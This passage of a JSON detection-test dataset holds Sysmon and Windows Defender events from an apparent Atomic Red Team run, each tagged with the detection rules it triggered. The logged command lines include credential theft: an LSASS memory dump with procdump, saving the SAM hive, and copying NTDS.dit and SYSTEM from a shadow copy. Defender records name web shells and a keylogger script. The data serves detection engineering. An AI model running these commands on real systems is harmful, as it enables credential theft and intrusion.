(WinBuild.160101.0800)","Hashes":"SHA1=3627AD593F3A956FA07382914B52AAB5CE98C817,MD5=72D5E2A3FF5D88C891E0DF1AA28B6422,SHA256=ABB99F7CFD3E9EB294501AAFA082A8D4841278CC39A4FB3DFF9942CA1F71A139,IMPHASH=96A5873241D90136570C05E55F0B5B2A","Image":"C:\\Windows\\System32\\mavinject.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA4B-5D31-0000-0010CB413D00","ProcessId":2604,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:15.754"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4078,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:15.776993Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Interactive AT Job"],"event":{"Event":{"EventData":{"CommandLine":"at 13:20 /interactive cmd","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Schedule service command line interface","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=EC6F04AA61D8F0FA0945EBFC58F6CC7CEBB1377A,MD5=F4416891D11BBA6975E5067FA10507C8,SHA256=73A9A6A4C9CF19FCD117EB3C430E1C9ACADED31B42875BA4F02FA61DA1B8A6DC,IMPHASH=FA9A9B0D471E4B5F3683C346C3D880BD","Image":"C:\\Windows\\System32\\at.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"at 13:20 /interactive cmd\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA6A-5D31-0000-0010B2953E00","ParentProcessId":5036,"ProcessGuid":"747F3D96-DA6A-5D31-0000-001004983E00","ProcessId":3864,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence - Scheduled Task Management AT","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:46.087"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4083,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:46.094355Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Indirect Command Execution"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\calc.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe","ParentImage":"C:\\Windows\\System32\\forfiles.exe","ParentProcessGuid":"747F3D96-DA72-5D31-0000-001056513F00","ParentProcessId":3680,"ProcessGuid":"747F3D96-DA72-5D31-0000-0010B1543F00","ProcessId":3160,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:54.160"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4101,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:57:54.165319Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-07-19 15:10:52.699","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ProcessId":5840,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\3ivx11ib\\3ivx11ib.dll","UtcTime":"2019-07-19 
15:10:52.699"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":4109,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:10:52.700901Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /user","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD8B-5D31-0000-001094584A00","ProcessId":5792,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
15:11:07.987"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4110,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:07.994501Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg save HKLM\\sam sam\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD95-5D31-0000-001075964A00","ProcessId":7140,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
15:11:17.211"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4117,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:17.224751Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Usage of Sysinternals Tools","Suspicious Use of Procdump on LSASS","Renamed ProcDump","LSASS Memory Dumping","Suspicious Use of Procdump","Procdump Usage"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD9E-5D31-0000-00106E2C4B00","ProcessId":5488,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
15:11:26.626"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4124,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:26.642464Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Shadow Copies Creation Using Operating Systems Utilities"],"event":{"Event":{"EventData":{"CommandLine":"vssadmin.exe create shadow /for=C:","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Command Line Interface for Microsoft® Volume Shadow Copy Service ","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=AC561205CD59BBCDB158525978FF65BDF17FDC3C,MD5=614B5C4238977130AA2270C8AD58CE6C,SHA256=D7577FB88CCA3169C7931DC0D8EC9A444227DC14F6C71D6D39D86A0C5CAD1976,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE","Image":"C:\\Windows\\System32\\vssadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"vssadmin.exe create shadow /for=C:\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DD9E-5D31-0000-00100C3F4B00","ParentProcessId":5036,"ProcessGuid":"747F3D96-DD9E-5D31-0000-00105E414B00","ProcessId":6584,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
15:11:26.981"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4129,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:26.989143Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Copying Sensitive Files with Credential Data"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit C:\\Extract\\ntds.dit\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD9F-5D31-0000-00101A4A4B00","ProcessId":5772,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
15:11:27.156"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4131,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:27.169217Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Copying Sensitive Files with Credential Data"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM C:\\Extract\\VSC_SYSTEM_HIVE\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD9F-5D31-0000-00102D4D4B00","ProcessId":976,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
15:11:27.192"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4132,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T15:11:27.202862Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"8","Category Name":"Trojan","Detection ID":"{511224D4-1EB4-47B9-BC4A-37E21F923FED}","Detection Time":"2019-07-18T20:40:00.580Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. 
","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1056\\Get-Keystrokes.ps1","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147725349","Threat Name":"Trojan:PowerShell/Powersploit.M","Type ID":"0","Type Name":"%%822","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":37,"Execution_attributes":{"ProcessID":6024,"ThreadID":5500},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:40:00.730676Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"8","Category Name":"Trojan","Detection ID":"{8791B1FB-0FE7-412E-B084-524CB5A221F3}","Detection Time":"2019-07-18T20:40:13.775Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error 
Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:XML/Exeselrun.gen!A&threatid=2147735426&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1086\\payloads\\test.xsl","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147735426","Threat Name":"Trojan:XML/Exeselrun.gen!A","Type ID":"2","Type Name":"%%823","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":48,"Execution_attributes":{"ProcessID":6024,"ThreadID":5500},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:40:16.396422Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"34","Category Name":"Tool","Detection ID":"{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}","Detection Time":"2019-07-18T20:40:16.697Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 
1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0005)","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"4","Severity Name":"High","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147708292","Threat Name":"HackTool:JS/Jsprat","Type ID":"8","Type Name":"%%862","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":75,"Execution_attributes":{"ProcessID":6024,"ThreadID":5500},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:41:16.418508Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"6","Category Name":"Backdoor","Detection ID":"{CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED}","Detection Time":"2019-07-18T20:40:18.385Z","Detection User":"MSEDGEWIN10\\IEUser","Engine 
Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:ASP/Ace.T&threatid=2147683177&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\cmd.aspx","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147683177","Threat Name":"Backdoor:ASP/Ace.T","Type ID":"0","Type Name":"%%822","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":76,"Execution_attributes":{"ProcessID":6024,"ThreadID":5500},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:41:17.508276Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"8","Category Name":"Trojan","Detection ID":"{F6272F78-9FD1-47D2-B206-89E0F0DCBDB9}","Detection Time":"2019-07-18T20:41:40.357Z","Detection 
User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 0.0.0.0","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sehyioa.A!cl&threatid=2147726426&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1218\\src\\Win32\\T1218-2.dll","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147726426","Threat Name":"Trojan:Win32/Sehyioa.A!cl","Type ID":"8","Type Name":"%%862","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":95,"Execution_attributes":{"ProcessID":6024,"ThreadID":5500},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider_attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":0,"TimeCreated_attributes":{"SystemTime":"2019-07-18T20:41:48.236136Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"34","Category Name":"Tool","Detection ID":"{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}","Detection 
